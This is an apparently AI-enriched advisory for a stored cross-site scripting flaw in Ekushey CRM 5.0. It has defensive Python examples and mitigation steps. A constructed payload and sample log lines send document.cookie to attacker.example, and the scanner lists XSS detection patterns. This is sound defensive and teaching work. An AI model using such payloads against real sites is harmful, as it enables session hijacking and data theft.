
CVE-2025-40989: CWE-79 Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') in Creativeitem Ekushey CRM

Medium
Published: Thu Oct 02 2025 (10/02/2025, 10:40:03 UTC)
Source: CVE Database V5
Vendor/Project: Creativeitem
Product: Ekushey CRM

Description

Stored Cross-Site Scripting vulnerability in Ekushey CRM v5.0 by Creativeitem, due to a lack of proper validation of user input submitted via "/ekushey/index.php/client/project_message/add/xxx", affecting the "message" parameter sent by POST. This vulnerability could allow a remote attacker to send a specially crafted query to an authenticated user and steal their session cookie details.

AI-Powered Analysis

Last updated: 10/02/2025, 10:48:52 UTC

Technical Analysis

CVE-2025-40989 is a stored Cross-Site Scripting (XSS) vulnerability in version 5.0 of Ekushey CRM by Creativeitem. The root cause is improper neutralization of user input during web page generation (CWE-79): the "message" parameter submitted by POST to "/ekushey/index.php/client/project_message/add/xxx" is stored without adequate validation or output encoding and is later rendered into pages viewed by other users. An attacker holding an account that can post project messages can therefore embed script that executes in the browser of every authenticated user who opens the affected page.

Because the payload is persisted server-side, nothing is required of the victim beyond viewing the message. The injected script runs in the CRM's origin, so it can read any cookie not marked HttpOnly, issue requests that carry the victim's session, or alter what the victim sees; the advisory names session-cookie theft as the primary outcome. If the session cookie carries the HttpOnly flag, exfiltration through document.cookie fails, but the script can still act on the victim's behalf through same-origin requests, so the flag narrows the impact rather than removing it.

The CVSS 4.0 base score is 5.1 (medium). The attack is network-reachable and of low complexity, and it requires user interaction (the victim must view the malicious message); injecting the payload in the first place requires an authenticated account able to reach the client-side endpoint. Beyond the session hijacking path, the record lists no further direct impact on confidentiality, integrity or availability. No public exploit or vendor patch is known at the time of writing. The CVE was reserved in April 2025 and published in October 2025 (assigner: INCIBE). Until Creativeitem releases a fix, affected organizations need interim mitigations to reduce exposure.
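The rendering step described above, as an added illustration for this advisory (it is not code from the advisory or from Ekushey CRM): the same stored "message" value interpolated verbatim, as a vulnerable application does, and encoded at output time. It also models what document.cookie exposes to the injected script, to show why the HttpOnly caveat matters. Only the field name comes from the advisory; the payload, cookie names and host names are constructed, and the assumption is that the message is placed inside an HTML element body.

```python
"""Why the stored message executes, and what output encoding changes.

Added illustration for this advisory; it is not Ekushey CRM code. It assumes
the stored "message" text is later placed inside an HTML element body (the
field name comes from the advisory, everything else is assumed). The
payload, cookie names and host names are constructed for the example.
"""
from html import escape

# Constructed attacker payload: loads an image from a host the attacker
# controls, leaking document.cookie in the query string.
PAYLOAD = ("<script>new Image().src='https://attacker.example/?c='"
           "+document.cookie</script>")


def render_unsafe(message: str) -> str:
    """Vulnerable pattern: the stored message is interpolated verbatim."""
    return f'<div class="project-message">{message}</div>'


def render_safe(message: str) -> str:
    """Hardened pattern: encode at output time for the HTML context.
    quote=True also encodes ' and ", so the same helper is safe inside
    quoted attribute values (it is still not safe inside <script> blocks or
    javascript: URLs, which need context-specific encoding)."""
    return f'<div class="project-message">{escape(message, quote=True)}</div>'


def has_live_script_tag(rendered: str) -> bool:
    """Check used by the example: does a real <script> tag survive rendering?
    In the encoded output the tag appears only as the text &lt;script&gt;."""
    return "<script" in rendered.lower()


def script_visible_cookies(set_cookie_headers: list[str]) -> dict[str, str]:
    """Model of what document.cookie exposes to injected script.

    Browsers hide cookies carrying the HttpOnly attribute from JavaScript,
    so those cannot be read and exfiltrated by the payload above; the script
    can still send same-origin requests that the browser attaches them to.
    Parsing is deliberately minimal: "name=value" followed by ";"-separated
    attributes.
    """
    visible: dict[str, str] = {}
    for header in set_cookie_headers:
        parts = [p.strip() for p in header.split(";")]
        name, _, value = parts[0].partition("=")
        attributes = {p.split("=", 1)[0].strip().lower() for p in parts[1:]}
        if "httponly" not in attributes:
            visible[name.strip()] = value.strip()
    return visible


if __name__ == "__main__":
    print(render_unsafe(PAYLOAD))   # tag survives: script runs in the viewer's browser
    print(render_safe(PAYLOAD))     # tag is inert text
    # Constructed Set-Cookie headers: only the non-HttpOnly cookie is readable.
    print(script_visible_cookies([
        "session=abc123; Path=/; Secure; HttpOnly",
        "ui_lang=en; Path=/",
    ]))
```

Encoding belongs at the point of output, not at input: a message stored raw can be shown in several places (message list, notification e-mail, export) and each needs encoding for its own context.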

Potential Impact

For European organizations using Ekushey CRM version 5.0, this vulnerability poses a risk of session hijacking through stored XSS attacks. Attackers can craft malicious messages that, when viewed by authenticated users, execute scripts to steal session cookies, potentially allowing unauthorized access to sensitive CRM data. This can lead to unauthorized data disclosure, manipulation of customer information, and disruption of business processes reliant on the CRM. Given that CRM systems often contain personal data protected under GDPR, exploitation could result in regulatory non-compliance and reputational damage. The medium severity rating reflects moderate risk; however, the impact could escalate if attackers leverage stolen sessions to perform further attacks or data exfiltration. The requirement for authenticated access to inject malicious content limits the attack surface but insider threats or compromised accounts increase risk. The absence of known exploits in the wild reduces immediate threat but does not eliminate future exploitation potential. Organizations relying on Ekushey CRM for client management, project tracking, or communication should be particularly vigilant.

Mitigation Recommendations

Since no official patch is currently available, organizations running Ekushey CRM 5.0 should apply the following interim mitigations:

1) Limit who can reach the message submission endpoint: enforce authentication and authorization so that only the intended client accounts can post project messages, and review existing accounts for shared, dormant or unneeded credentials, since injection requires an authenticated account.

2) Add Web Application Firewall (WAF) rules for POST requests to the endpoint that inspect the "message" parameter for script tags, event-handler attributes (onerror=, onload=), javascript: URIs and their URL- or entity-encoded variants. Treat this as a detective and slowing control, not a fix; WAF filters can be bypassed.

3) Deploy a Content Security Policy that disallows inline script (a script-src without 'unsafe-inline'). Trial it in Content-Security-Policy-Report-Only mode first, because it will also block any inline scripts or handlers the CRM interface itself uses.

4) Set the session cookie with the HttpOnly, Secure and SameSite attributes. HttpOnly prevents the document.cookie theft described in the advisory, although injected script can still act on the victim's behalf through same-origin requests.

5) Train users to treat unexpected project messages with suspicion and to report anomalies.

6) Monitor for exploitation: ordinary access logs do not contain POST bodies, so use application-level or WAF audit logging to record the "message" field, alert on requests to the endpoint whose message contains markup, and watch for an existing session reused from a new source address.

7) Where the application code can be modified, encode the message at render time wherever it is displayed (for a PHP application, htmlspecialchars with ENT_QUOTES or the template engine's auto-escaping) rather than relying on input filtering alone. If input filtering is the only option, use an allowlist of permitted characters or tags instead of a blocklist.

8) Apply the official patch promptly once Creativeitem releases one.

9) Consider isolating the CRM or restricting network access to it (VPN or allowlisted ranges) to reduce exposure while the vulnerability is unpatched.
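The log-monitoring and CSP items above, as an added example that is not part of the advisory and not Ekushey CRM code. It assumes a request log recorded as JSON lines that include the POST form fields (a constructed format; web-server access logs do not contain bodies, so this needs application or WAF audit logging), treats the "xxx" segment of the advisory's endpoint as a wildcard (an assumption about what it stands for), and runs over constructed sample entries. It goes beyond the specific payload in the advisory by decoding URL and HTML-entity encodings before matching.

```python
"""Spot exploitation attempts against the project_message endpoint in logs.

Added example, not part of the advisory and not Ekushey CRM code. It assumes
a request log that records POST form fields as JSON lines (a constructed
format: ordinary web-server access logs do not contain request bodies, so
this needs application-level or WAF audit logging). The trailing "xxx"
segment of the advisory's endpoint is treated as a wildcard, which is an
assumption about what it stands for. All log content below is constructed.
"""
import html
import json
import re
from urllib.parse import unquote_plus

ENDPOINT_RE = re.compile(r"/ekushey/index\.php/client/project_message/add/[^/?#]+$")

# Script-injection indicators. They are checked against decoded text so that
# percent-encoded or entity-encoded payloads do not slip past. Heuristic:
# expect the occasional false positive on legitimate text such as "option=".
XSS_PATTERNS = [
    re.compile(r"<\s*script\b", re.I),
    re.compile(r"\bon[a-z]+\s*=", re.I),              # onerror=, onload=, ...
    re.compile(r"javascript\s*:", re.I),
    re.compile(r"<\s*(svg|iframe|object|embed|img)\b", re.I),
]


def decoded_variants(value: str) -> set[str]:
    """Return the raw value plus single- and double-URL-decoded forms,
    each also HTML-entity-decoded, so layered encodings are examined."""
    once = unquote_plus(value)
    twice = unquote_plus(once)
    return {html.unescape(v) for v in (value, once, twice)}


def suspicious_message(value: str) -> list[str]:
    """Patterns that match any decoded form of the message, or [] if clean."""
    variants = decoded_variants(value)
    return [p.pattern for p in XSS_PATTERNS
            if any(p.search(v) for v in variants)]


def scan_log(lines: list[str]) -> list[dict]:
    """Flag POSTs to the vulnerable endpoint whose message looks like markup."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        if rec.get("method") != "POST" or not ENDPOINT_RE.search(rec.get("path", "")):
            continue
        hits = suspicious_message(rec.get("form", {}).get("message", ""))
        if hits:
            findings.append({"ts": rec["ts"], "src": rec.get("src"),
                             "user": rec.get("user"), "matched": hits})
    return findings


# A CSP that denies inline script, so a message that reaches the page
# unencoded still cannot run. Trial it as Content-Security-Policy-Report-Only
# first: it also blocks the application's own inline scripts and handlers.
CSP_HEADER = ("Content-Security-Policy: default-src 'self'; script-src 'self'; "
              "object-src 'none'; base-uri 'self'")

# Constructed sample log (JSON lines). The second and fourth entries carry
# encoded payloads; the third is a GET and is ignored.
SAMPLE_LOG = """
{"ts":"2025-10-02T10:40:03Z","src":"203.0.113.7","user":"client42","method":"POST","path":"/ekushey/index.php/client/project_message/add/17","form":{"message":"Please review the attached invoice"}}
{"ts":"2025-10-02T10:41:10Z","src":"203.0.113.7","user":"client42","method":"POST","path":"/ekushey/index.php/client/project_message/add/17","form":{"message":"%3Cimg%20src%3Dx%20onerror%3D%22fetch('https://attacker.example/?c='%2Bdocument.cookie)%22%3E"}}
{"ts":"2025-10-02T10:42:30Z","src":"198.51.100.9","user":"client07","method":"GET","path":"/ekushey/index.php/client/project_message/add/17","form":{}}
{"ts":"2025-10-02T10:43:01Z","src":"203.0.113.7","user":"client42","method":"POST","path":"/ekushey/index.php/client/project_message/add/17","form":{"message":"&lt;script&gt;alert(1)&lt;/script&gt;"}}
"""

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG.splitlines()):
        print(finding)
    print(CSP_HEADER)
```

A hit should be followed up by checking whether the message was actually stored and who has viewed the project since; the user and source address in each finding are the pivot points for that investigation.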


Technical Details

Data Version: 5.1
Assigner Short Name: INCIBE
Date Reserved: 2025-04-16T09:08:37.856Z
CVSS Version: 4.0
State: PUBLISHED

Threat ID: 68de571d8613837f0a3aa611

Added to database: 10/2/2025, 10:42:37 AM

Last enriched: 10/2/2025, 10:48:52 AM

Last updated: 10/2/2025, 2:20:03 PM


